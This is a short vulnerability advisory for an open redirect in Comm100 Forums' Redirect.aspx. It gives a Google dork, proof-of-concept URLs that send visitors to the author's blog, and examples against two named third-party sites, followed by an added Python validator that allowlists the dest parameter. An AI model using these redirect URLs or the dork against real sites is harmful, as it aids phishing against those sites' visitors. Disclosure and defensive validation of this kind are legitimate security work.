Comm100 Forums suffer from an arbitrary redirect vulnerability.
# Date: 8.10.2011
# Author: Sony
# Software Link: http://comm100.com/
# Google Dorks: Forum Powered by Comm100
# Blog : http://st2tea.blogspot.com
..................................................................
Demo:
http://hosted.comm100.com/Forum/Default.aspx?siteid=10000
Before:
http://hosted.comm100.com/Forum/Redirect.aspx?information=Querystring%20with%20name%20\%27siteId\%27%20is%20null&dest=http%3a%2f%2fwww.comm100.com%2fforum
After:
http://hosted.comm100.com/Forum/Redirect.aspx?information=welcome to my blog&dest=http://st2tea.blogspot.com
Some Demo:
http://support.newpotatotech.com/Forum/Redirect.aspx?information=welcome%20to%20my%20blog%20&dest=http://st2tea.blogspot.com
http://www.theabrasivescompany.com/Forum/Redirect.aspx?information=welcometo my blog&dest=http://st2tea.blogspot.com
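
Added example (not part of the original advisory and not Comm100 code): a server-side check for the dest parameter of Redirect.aspx, run against the Before and After URLs above. The allowlist contents and the names is_safe_dest and check_redirect_url are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts the forum may legitimately redirect to (taken from the
# "Before" URL in the advisory; a real deployment supplies its own list).
ALLOWED_HOSTS = {"www.comm100.com", "hosted.comm100.com"}

# URLs from the advisory ("Before" shown with its information parameter omitted).
BEFORE = ("http://hosted.comm100.com/Forum/Redirect.aspx"
          "?dest=http%3a%2f%2fwww.comm100.com%2fforum")
AFTER = ("http://hosted.comm100.com/Forum/Redirect.aspx"
         "?information=welcome to my blog&dest=http://st2tea.blogspot.com")


def is_safe_dest(dest, allowed_hosts=ALLOWED_HOSTS):
    """True only for a rooted same-site path or an http(s) URL on an allowed host."""
    # Reject empty values, backslashes, control characters and padding, which
    # browsers and URL parsers normalise in different ways.
    if not dest or dest != dest.strip() or any(c in dest for c in "\\\r\n\t"):
        return False
    try:
        parts = urlsplit(dest)
        host = (parts.hostname or "").lower()
        has_userinfo = parts.username is not None or parts.password is not None
    except ValueError:  # malformed authority, e.g. an unclosed IPv6 bracket
        return False
    if not parts.scheme and not parts.netloc:
        # Relative target: accept "/path", refuse "path" and anything else.
        return dest.startswith("/") and not dest.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # also covers protocol-relative "//host" (empty scheme)
    if has_userinfo:
        return False  # "http://allowed-host@other-host/" style confusion
    return host in allowed_hosts  # exact match, so no suffix or prefix tricks


def check_redirect_url(url):
    """Return (dest, is_safe) for a Redirect.aspx request URL."""
    dest = parse_qs(urlsplit(url).query).get("dest", [""])[0]
    return dest, is_safe_dest(dest)


if __name__ == "__main__":
    for label, url in (("Before", BEFORE), ("After", AFTER)):
        dest, ok = check_redirect_url(url)
        print(f"{label}: dest={dest!r} -> {'allow' if ok else 'refuse'}")
```

A handler that refuses the redirect when this check fails, or that falls back to a fixed landing page, keeps the dest parameter from sending visitors off-site.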